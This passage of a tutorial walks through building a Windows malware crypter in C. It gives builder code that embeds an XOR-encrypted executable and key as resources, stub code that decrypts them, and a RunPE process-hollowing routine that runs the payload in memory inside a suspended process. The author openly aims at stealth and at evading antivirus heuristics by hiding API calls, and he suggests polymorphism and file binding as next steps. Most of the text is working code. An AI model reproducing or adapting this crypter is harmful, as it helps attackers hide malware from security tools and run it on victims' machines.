hFile = CreateFile(“crypted.exe”, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
error(“Error – Could not create file”);
if(WriteFile(hFile, pBuffer, rSize, &BytesWritten, NULL)==0)
error(“Error – Could not write to file”);
hUpdate = BeginUpdateResource(“crypted.exe”, FALSE);
if (UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(10), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), sData->pFileBuffer, sData->FileSize)==0)
error(“Error – Could not update resource”);
if (UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(20), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), sData->pKey, sData->KeySize)==0)
error(“Error – Could not update resource”);
EndUpdateResource(hUpdate, FALSE);
This function mostly uses the win32 API and might take a bit to understand. So let’s walk through it.  If you are unfamiliar with what HRSRC, HGLOBAL, HANDLE are, well they are void pointers and defined by Microsoft for easier identification.
Again we pass our struct pointer and begin the work.
First we find the stub.exe file, and create a buffer pointing to its contents.
*Note: This is an area we will return to as we have to add a resource file, after the stub as been compiled.
Next we create a new file (“crytped.exe”) and write the data from the stub pointer (pBuffer) to it. At this point as you will see later, we have essentially extracted the “stub.exe” which will be embedded in our cypter, and copied it to a file on disk called “cypted.exe”.
The reason for doing it this way has an advantage because when the final crypter is complete you will not need a stub file to accompany the main app. It is all self contained.
Now that have a handle (pointer to) this new file we can begin to update its resources with the contents of out encrypted buffer and decryption key.
Note: I am passing the key, so I don’t have to hard copy it in the stub, this can allow for random and dynamic unique key generation. (See Learning Topic 1)
After this function is complete (successfully) the new program will be complete, and it will be up to our stub to properly decrypt our buffer and run it dynamically (In memory).
Highlights of Resources:
Let’s look at the argument MAKEINTRESOURCE(20). The “20” is an arbitrary but unique number that identifies it in the stub. Anytime you update a resource you must use a different number for proper identification. When we return to our resource file in this main builder you will see how you add them.
The Stub
The stub is a separate program, so you can create a new project (again win32 console app). Now just to note, despite opening a console app we are actually going to create a winapi app (doesn’t show console – ie more stealth like.)
The main function should look like
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
Now the flow of the main app is Load our new structure from the resources updated, decrypt the buffer, and run it.  Part IV: LoadStruct
If we look at the struct again, you will notice its slightly different.
struct StubData{
unsigned char * pFileBuffer;
unsigned long FileSize;
unsigned char * pKey;
unsigned int KeySize;
char FileName[MAX_PATH];
The addition was the FileName that will hold the full path of the current running process. I included into the struct just to clean things up again.  LoadStruct Function
void LoadStruct(struct StubData * sData)
HRSRC hRsrc;
if (hRsrc == NULL)exit(EXIT_FAILURE);
sData->FileSize = SizeofResource(NULL, hRsrc);
hGlob = LoadResource(NULL, hRsrc);
if (hGlob == NULL)exit(EXIT_FAILURE);
sData->pFileBuffer = (unsigned char*)LockResource(hGlob);
if (sData->pFileBuffer == NULL)exit(EXIT_FAILURE);
if (hRsrc == NULL)exit(EXIT_FAILURE);
sData->KeySize = SizeofResource(NULL, hRsrc);
hGlob = LoadResource(NULL, hRsrc);
if (hGlob == NULL)exit(EXIT_FAILURE);
sData->pKey = (unsigned char*)LockResource(hGlob);
if (sData->pKey == NULL)exit(EXIT_FAILURE);
GetModuleFileName(NULL, sData->FileName, MAX_PATH);}
This starts by finding the resources we assigned to it back in the builder. Note the MAKEINTRESOURCE() must correspond to the arbitrary number previously given.  The function then loads those resources in memory and we take a pointer and fill our structure.
At this point we have all the data in one place (the stub which decrypts and runs the app, and our buffer in memory containing the encrypted buffer of the app to run)
Part V: Decryption
You will notice this is almost the same as the encryption function as an XOR method is reversible in the same method.
void Decrypt(struct StubData * sData)
int i,j;  j=0;
*(sData->pFileBuffer+i) ^=*(sData->pKey+j);
if (j>=sData->KeySize)j=0;
The only difference is that I didn’t have to re-declare my key and key length. They were updated via resources.
Now to the Magic

Part VI: RunPE
Before I get too far into the Code I want to give credits to TugHack as the basis for this function was based off his work.
I have slightly modified the original to make it easier to follow.
Dive in shall we?
void runPE(struct StubData * sData)
PTRZwUnmapViewOfSection pZwUnmapViewOfSection = NULL;
int i;
memset(&si, 0, sizeof(si));
si.cb = sizeof(STARTUPINFO);
ctx.ContextFlags = CONTEXT_FULL;
pidh = (PIMAGE_DOS_HEADER)&sData->pFileBuffer[0];
if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
pinh = (PIMAGE_NT_HEADERS)&sData->pFileBuffer[pidh->e_lfanew];
if(pinh->Signature != IMAGE_NT_SIGNATURE)
CreateProcess(NULL, sData->FileName, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle(“ntdll.dll”), “ZwUnmapViewOfSection”);
pZwUnmapViewOfSection(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase);
VirtualAllocEx(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase, &sData->pFileBuffer[0], pinh->OptionalHeader.SizeOfHeaders, NULL);
for(i = 0; i < pinh->FileHeader.NumberOfSections; i++)
pish = (PIMAGE_SECTION_HEADER)&sData->pFileBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i];
WriteProcessMemory(pi.hProcess, (void *)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress), &sData->pFileBuffer[pish->PointerToRawData], pish->SizeOfRawData, NULL);
GetThreadContext(pi.hThread, &ctx);
ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(pi.hThread, &ctx);
Lets begin with the startup info, process info, and context.  They are each structures for holding data associated with the CreateProcess Function
The STARTUPINFO structure is used with the CreateProcess function to specify main window properties if a new window is created for the new process
Contains information about a newly created process and its primary thread. It is used with the CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, or CreateProcessWithTokenW function.
The CONTEXT record was created by CreateProcess, in the case of an Windows create process, and contains the start address according to the loaded exe, and also a thunking location according to the kernel32.dll visable when CreateProcess was run. In fact, the NtContinue thunks on through BaseProcessStartThunk, see nt/private/windows/base/client/context.c. The true starting address is in eax of the CONTEXT, BaseProcessStartThunk is found in eip.
If this is slightly confusing study up on the cpu registers (ASM … go!) and what they mean.  Next we declare some pointer to the headers associated with Portable Executables (PE) files.
To understand the PE file and header structure here is a picture.
[Image: Cc301805.pefig01%28en-us,MSDN.10%29.gif]
For an Indepth readup on the subject matter please refer to
After setting the header pointers we are able to create our process we do this with the CREATE_SUSPENDED flag, that tells the API to keep the process suspended until the ResumeThread function is called. This creates a new process and its primary thread
Now we have to unmap the sections of our PE file. This is also the 1 function I demonstrate obfuscating the API call.
I previously declared a new type
typedef void (WINAPI *PTRZwUnmapViewOfSection)(
IN HANDLE ProcessHandle, IN PVOID BaseAddress);
And used it as so…
PTRZwUnmapViewOfSection pZwUnmapViewOfSection = NULL;
pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle(“ntdll.dll”), “ZwUnmapViewOfSection”);
pZwUnmapViewOfSection(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase);
As you can see I didn’t have to make a direct call to ZqUnmapViewOfSection and it allows for some additional obfuscation in string calls. Heuristics in AV’s might take a bit more work.  We then use VirtualAllocEx which reserves or commits a region of memory within the virtual address space of a specified process.
Finally we are going to write out decrypted buffers sections with WriteProcessMemory, Realign everything, and resume thread. Cheers at this point the unsuspended process running the stub but the original file in memory… and our stub returns and exits cleanly.
PHEW… we made it, almost.
Part VII: Putting it all together
I mentioned we would have to come back to our builder and this is where I will do that. First we have to compile our stub.exe project (set to release to get rid of debugging features – makes it smaller)
Then we copy that executable and place it in the root directory of the builder “Cryptit” project. Create a new file (Notepad works nice) in the same place and call it crytper.rc This is our resource file.
The contents will be…

Code:#define IDR_STUB 1  IDR_STUB STUB DISCARDABLE “stub.exe”
*If you did not put it in the root directory you will need to include the path to its location (don’t forget to escape your forward slashes — \\stub\\resources\\etc…). You will also know this is where I defined my IDR_STUB to 1 which I used earlier in finding that resource.
The complete Directory layout will be similar to the following if you used the same IDE/compiler defaults
-+obj (stuff inside)
-Cryptit.cbp (code::blocks project file)
Part VIII: Additional learning topics and features for you to think about
I previously stated that I intentionally left out common features in crypters some of these for you to consider would be
[*] Icon addition and dynamically changing them
[*] Further obfuscation of code/strings/api calls
[*] GUI if you desire
[*] Binding Files
[*] Polymorphism/Unique Stub Generation
Part IX: Finale
I hoped you enjoyed the tutorial and learned something from its content. As promised below are a few pics of the final program. Also the source for each file (Stub and Builder). Additionally there is a download link where you are able to download my code::blocks project files.
Read More